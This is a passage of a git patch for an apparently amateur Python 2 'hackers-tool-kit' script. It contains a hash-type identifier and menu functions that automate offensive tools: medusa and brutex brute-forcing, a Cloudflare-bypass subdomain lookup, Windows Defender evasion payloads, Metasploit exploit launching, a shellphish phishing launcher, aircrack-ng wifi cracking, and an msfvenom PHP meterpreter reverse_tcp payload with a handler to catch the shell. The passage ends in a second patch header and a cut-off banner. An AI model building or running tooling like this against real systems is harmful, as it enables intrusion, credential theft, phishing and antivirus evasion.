sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 8cd05e7cd121e5106c0c7f36d166212c67f10e3c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 17 May 2019 00:09:16 +0100 Subject: [PATCH 131/214] Add files via upload --- htk.py | 2780 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2780 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..a86412b --- /dev/null +++ b/htk.py @@ -0,0 +1,2780 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ 